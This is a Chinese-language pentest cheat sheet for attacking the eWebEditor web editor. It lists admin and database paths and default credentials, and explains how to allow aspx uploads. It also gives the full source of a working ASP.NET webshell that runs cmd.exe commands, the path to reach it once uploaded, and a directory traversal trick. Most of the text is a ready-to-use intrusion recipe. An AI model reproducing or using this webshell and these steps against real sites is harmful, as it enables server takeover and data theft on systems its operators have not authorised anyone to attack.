eWebEditor 的一些利用方式

开发文档

http://www.ewebeditor.net/documentation/
http://www.ewebeditor.net/

常见路径

1
2
3
4
5
6
7
8
9
10
ewebeditor/Admin_Login.asp
Admin_Login.asp # 登录页面
Admin_Default.asp # 管理首页
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db/ewebeditor.mdb # 默认数据库路径
login_admin.asp

管理入口

1
2
http://www.victim.com/ewebeditor/admin/login.aspx
http://127.0.0.1/ewebeditor/admin_login.asp

默认的用户名和密码是

1
2
admin/admin
admin/admin888

其他

提供御剑字典一枚

1
等待更新

已登录后台 getshell

带图的 详细资料 请查看2017年7月渗透测试报告归档。

选择样式管理-设置,修改上传图片的后缀名限制,允许上传aspx文件。

以下为JspSpy的核心代码,将该文件保存为webshell.aspx上传。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<script Language="c#" runat="server">
protected void FbhN(object sender,EventArgs e) {
try {
Process ahAE=new Process();
ahAE.StartInfo.FileName=kusi.Value;
ahAE.StartInfo.Arguments=bkcm.Value;
ahAE.StartInfo.UseShellExecute=false;
ahAE.StartInfo.RedirectStandardInput=true;
ahAE.StartInfo.RedirectStandardOutput=true;
ahAE.StartInfo.RedirectStandardError=true;
ahAE.Start();
string Uoc=ahAE.StandardOutput.ReadToEnd();
Uoc=Uoc.Replace("<","&lt;");
Uoc=Uoc.Replace(">","&gt;");
Uoc=Uoc.Replace("\r\n","<br>");
tnQRF.Visible=true;
tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
} catch(Exception error) {
Response.Write(error.Message);
}
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body>
<form id="cmd" method="post" runat="server">
<div runat="server" id="vIac">
<p>
路径:<br/>
<input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
</p>
参数:<br/>
<input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
<div id="tnQRF" runat="server" visible="false" enableviewstate="false"></div>
</div>
</form>
</body>
</HTML>

默认上传路径为

1
http://www.victim.com/ewebeditor/uploadfile/20170718171925327.aspx

访问该路径即获得 webshell。

历史漏洞

目录遍历

登陆编辑器—上传文件管理—选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了。

参考资料

Ewebeditor编辑器漏洞总结 Cracer
http://cracer.com/?p=366